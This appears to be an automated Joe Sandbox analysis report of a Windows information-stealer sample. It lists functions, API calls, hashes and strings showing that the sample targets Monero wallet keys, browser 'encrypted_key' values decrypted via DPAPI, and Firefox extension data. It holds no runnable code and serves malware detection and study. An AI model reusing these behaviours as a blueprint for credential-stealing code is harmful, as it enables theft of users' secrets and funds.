                              • Opcode Fuzzy Hash: 762c61fab260f71ef29c4c556e5b98e82d702a4ef6ee199917b5e0ecea8b261f
                              • Instruction Fuzzy Hash: 62E10E729100089BCB04EBA5DCB6EEE7339AF14304F50855FF15672291EE387A5DCB6A
                              Function 004CD500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004D8CF0: GetSystemTime.KERNEL32(004E0E1B,012AA480,004E05B6,?,?,004C13F9,?,0000001A,004E0E1B,00000000,?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004D8D16
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004CD581
                              • lstrlen.KERNEL32(00000000), ref: 004CD798
                              • lstrlen.KERNEL32(00000000), ref: 004CD7AC
                              • DeleteFileA.KERNEL32(00000000), ref: 004CD82B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: d69d5ac15df4fcb813b5adbf299065b60a904480c06f31727f3302c4fa667278
                              • Instruction ID: e17aace51fbd60dbacd3e0a93b3c289570045e115479b1caa83523eba70dddd0
                              • Opcode Fuzzy Hash: d69d5ac15df4fcb813b5adbf299065b60a904480c06f31727f3302c4fa667278
                              • Instruction Fuzzy Hash: 2E9145729101089BCB04FBA5DC76EEE7379AF14304F50856FF11662291EF387A19CB6A
                              Function 004CD880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004D8CF0: GetSystemTime.KERNEL32(004E0E1B,012AA480,004E05B6,?,?,004C13F9,?,0000001A,004E0E1B,00000000,?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004D8D16
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004CD901
                              • lstrlen.KERNEL32(00000000), ref: 004CDA9F
                              • lstrlen.KERNEL32(00000000), ref: 004CDAB3
                              • DeleteFileA.KERNEL32(00000000), ref: 004CDB32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: d5712488d7720929168d11257ab01740f5f7562783773ddcabf9036a8f6c7c6a
                              • Instruction ID: 915ccb390ca2f891278f882344c36feadcfe0aa9f5590b6915c3d1b42a3bf155
                              • Opcode Fuzzy Hash: d5712488d7720929168d11257ab01740f5f7562783773ddcabf9036a8f6c7c6a
                              • Instruction Fuzzy Hash: CA8144729201089BCB04FBA5DCB6EEE7379AF14304F40455FF14662295EF387A19CB6A
                              Function 0053FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AdjustPointer
                              • String ID:
                              • API String ID: 1740715915-0
                              • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                              • Instruction ID: fb01effc07933d18586452425437f0876c0cbd2fd9f7ef29d4a85362dd17e17b
                              • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                              • Instruction Fuzzy Hash: B451A172900206AFEB298F54D849BBABBB4FF41314F24453DED0997691E731ED50DB90
                              Function 004CA560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                              Download Yara Rule
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 004CA664
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocLocallstrcpy
                              • String ID: @$v10$v20
                              • API String ID: 2746078483-278772428
                              • Opcode ID: f8b022e8f7b9140e01a71dfa7b522b0eeb1087194bd670d80f94497e60dda0f9
                              • Instruction ID: 32fa11eb69a5f2352dbcae6529e23db6cce2697988b0539015170598d2cc851c
                              • Opcode Fuzzy Hash: f8b022e8f7b9140e01a71dfa7b522b0eeb1087194bd670d80f94497e60dda0f9
                              • Instruction Fuzzy Hash: 0051693461020CAFDB14DFA5CDA6FED73B5BF44308F00811EE90A5B295DB78AA15CB5A
                              Function 004CF5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004CA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004CA13C
                                • Part of subcall function 004CA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004CA161
                                • Part of subcall function 004CA110: LocalAlloc.KERNEL32(00000040,?), ref: 004CA181
                                • Part of subcall function 004CA110: ReadFile.KERNEL32(000000FF,?,00000000,004C148F,00000000), ref: 004CA1AA
                                • Part of subcall function 004CA110: LocalFree.KERNEL32(004C148F), ref: 004CA1E0
                                • Part of subcall function 004CA110: CloseHandle.KERNEL32(000000FF), ref: 004CA1EA
                                • Part of subcall function 004D8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004D8FE2
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,004E1678,004E0D93), ref: 004CF64C
                              • lstrlen.KERNEL32(00000000), ref: 004CF66B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 2e4ed3aec9daf43288e5c88f61bc5d83d90eb23c6a9468866648c80d99632293
                              • Instruction ID: 9f35d707e95876ef7840b601b775ebd669e51eec5886749c7f60d20f72399159
                              • Opcode Fuzzy Hash: 2e4ed3aec9daf43288e5c88f61bc5d83d90eb23c6a9468866648c80d99632293
                              • Instruction Fuzzy Hash: C0515E729101089BCB04FBA1DCA6EED7379AF54304F00852FF50667295EE386A1DCB6A
                              Function 004D37B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 4cb3e50b55359962cf0f79e171d2f766904f90a528678740d6ec13ebc0f7f266
                              • Instruction ID: 0705c08d768275fb06b309cd0acd23d2a7d408e32b82619a2ca6c361fffb3371
                              • Opcode Fuzzy Hash: 4cb3e50b55359962cf0f79e171d2f766904f90a528678740d6ec13ebc0f7f266
                              • Instruction Fuzzy Hash: 554172B1D101099BCF04EFA5D865AEEB779AF14305F00801FF51576390EBB8AA45CF9A
                              Function 004CA430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004CA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004CA13C
                                • Part of subcall function 004CA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004CA161
                                • Part of subcall function 004CA110: LocalAlloc.KERNEL32(00000040,?), ref: 004CA181
                                • Part of subcall function 004CA110: ReadFile.KERNEL32(000000FF,?,00000000,004C148F,00000000), ref: 004CA1AA
                                • Part of subcall function 004CA110: LocalFree.KERNEL32(004C148F), ref: 004CA1E0
                                • Part of subcall function 004CA110: CloseHandle.KERNEL32(000000FF), ref: 004CA1EA
                                • Part of subcall function 004D8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004D8FE2
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004CA489
                                • Part of subcall function 004CA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>OL,00000000,00000000), ref: 004CA23F
                                • Part of subcall function 004CA210: LocalAlloc.KERNEL32(00000040,?,?,?,004C4F3E,00000000,?), ref: 004CA251
                                • Part of subcall function 004CA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>OL,00000000,00000000), ref: 004CA27A
                                • Part of subcall function 004CA210: LocalFree.KERNEL32(?,?,?,?,004C4F3E,00000000,?), ref: 004CA28F
                                • Part of subcall function 004CA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004CA2D4
                                • Part of subcall function 004CA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 004CA2F3
                                • Part of subcall function 004CA2B0: LocalFree.KERNEL32(?), ref: 004CA323
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 513aed0420a0584920c244a5dffebeffcf7217755d8801329f6abf68d99e77c6
                              • Instruction ID: cf23acb3afb1543cd77f82c3cd17a781f36f30b2546d2eda92302ba8084411f6
                              • Opcode Fuzzy Hash: 513aed0420a0584920c244a5dffebeffcf7217755d8801329f6abf68d99e77c6
                              • Instruction Fuzzy Hash: 563150BAD0110CABCB44DBA4DC45FEFB3B8AB58308F44855EE901A3241E7389A14CB66
                              Function 004D9660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 004D967B
                                • Part of subcall function 004D8EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004D96AE,00000000), ref: 004D8EEB
                                • Part of subcall function 004D8EE0: RtlAllocateHeap.NTDLL(00000000), ref: 004D8EF2
                                • Part of subcall function 004D8EE0: wsprintfW.USER32 ref: 004D8F08
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004D973B
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 004D9759
                              • CloseHandle.KERNEL32(00000000), ref: 004D9766
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 3729781310-0
                              • Opcode ID: 639846f47fb6b2d67198af0f54293c218d7bf5f890c39a3590d52eb2c5af63fc
                              • Instruction ID: 88d649b705584e8b7e29de43285917dc2652e076b89e697e175605cd8b6df1ee
                              • Opcode Fuzzy Hash: 639846f47fb6b2d67198af0f54293c218d7bf5f890c39a3590d52eb2c5af63fc
                              • Instruction Fuzzy Hash: 4A315A71E10208EBDB14DFE0CD59BEDB3B9BB44700F10845AF606AB284DB786E49CB59
                              Function 004D8810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004E05BF), ref: 004D885A
                              • Process32First.KERNEL32(?,00000128), ref: 004D886E
                              • Process32Next.KERNEL32(?,00000128), ref: 004D8883
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • CloseHandle.KERNEL32(?), ref: 004D88F1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
